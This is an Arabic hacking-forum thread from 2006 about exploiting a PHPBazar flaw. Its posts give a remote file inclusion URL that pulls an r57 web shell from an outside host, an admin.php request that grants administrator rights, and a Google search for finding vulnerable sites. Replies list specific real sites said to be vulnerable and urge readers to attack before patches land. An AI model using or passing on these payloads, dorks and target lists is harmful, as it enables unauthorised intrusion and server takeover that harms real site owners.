المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة PHPBazar

AMC
21-05-2006, 12:09
السلام عليكم

هالثغره لها استخدامين
الاول يمكنك من رفع شيل على الموقع وهو كالتالى

classified_right.php?language_dir=http://rst.void.ru/download/r57shell.txt??cmd=ls

طبعا تحطه ورا اسم الموقع

والاستخدام الثانى يسمحلك باضافة عضو جديد واعطاه الصلاحيه اللى تبيها
وهو كالتالى

/admin/admin.php?action=edit_member&value=1

وبالاستثمار الاخير تقدر تضيف روحك ادمن وتشوف شغلك مع الموقع
بس على فكره فى بعض المواقع قفلت الاستثمار الاول (تم ايجاد رقعه له)
ولاكن نست ترقيع الاستثمار الثانى
وتاريخ اكتشاف الثغره اهو 19/5
يعنى من توها جديده مااوصيكم لحقو قبل ترقيع اغلب المواقع
وللبحث عن المواقع المصابه بالثغره اضغط هنا (http://www.google.com/search?hl=ar&q=inurl%3Aclassified.php+phpbazar&lr=)

يالله فمان الله
ambt
21-05-2006, 01:08
اخوي مشكور

لكن ياليت تشرح اكثر

انا فهمت بس كثيرين ماراح يفهموا

وانا اخاف اني فاهم غلط

ارجوا التوسع في الشرح مع التمثيل

وشكرا

تحيتي
عز الرجال
21-05-2006, 01:22
هذا مثال أنا طبقته عن طريق الإستخدام الثاني وهو إضافة آدمن
موقع للتجربة


http://anunturi.ro-f l a s h.ro/admin/admin.php?action=edit_member&value=1
ambt
21-05-2006, 01:26
انا مرة مش فاهم

ارجوا توضيح الاستغلالين

بانتظارك
عز الرجال
21-05-2006, 01:31
وهذا موقع آخر مصاب
http://www.building99.com/classified.php
عز الرجال
21-05-2006, 01:44
شرح الإستغلالين
1- classified_right.php?language_dir=http://rst.void.ru/download/r57shell.txt??cmd=ls


هذا الإستغلال يمكنك من رفع شل على الموقع وبالتالي إختراق السيرفر أنا حاولت أبحث لكن الظاهر أنه أغلب المواقع زي ماقال الأخ مقفله هاذي الثغرة



2-/admin/admin.php?action=edit_member&value=1


بالنسبة للإستغلال هذا فهو يقوم بتسجيل بالموقع وتخار أنك تكون آدمن راح اوضح بهذا الموقع

http://www.building99.com//admin/admin.php?action=edit_member&value=1


اضغط على الصورة لتراها بحجم كبير
http://www.nooruae.org/uploading/phpbaz.jpg
AMC
21-05-2006, 01:53
ماقصر عز وضحلك
وهذا موقع مصاب بالثغره الاول مالت الشيل

http://www.maithuna.ch/ads/classified_right.php?language_dir=http://drmist.ru/shell.txt??cmd=ls
فـ الحربي ـهد
22-05-2006, 03:45
مشكور يا عز على الثغره والشرح

وعساك على القوة

جاري ...
AMC
22-05-2006, 04:33
يصير ارد بدال عز هاهاهاهاها
حياك الله فهد
max payne
23-05-2006, 01:02
مشكورين خويه جاري تجريب الثغره
AMC
23-05-2006, 01:41
العفو ماكس
عز الرجال
23-05-2006, 02:06
لا شكر على واجب شباب
والله يعني ونكون يد وحدة ونتعاون مع بعض
_Neo__The_OnE
23-05-2006, 09:53
مشكور والله على الثغرة وفعلا معظم المواقع المصابة بالثغرة مقفولة ومش الثغرة دى بس لا دا معظم الثغراتاللى بتطلع بلاقى المواقع المصابة بالثغرة مقفولة :(
AMC
23-05-2006, 11:01
الترقيع صاير اول اباول :)
ولا تنسى انه الثغره مو اول ما يكتشفها الواحد يحطها
لازم يحللها (يعنى يخترق جم موقع فيها) بعدين يخليها ببلك
وعلى مايخليها ببلك ينزل ترقيع لها :)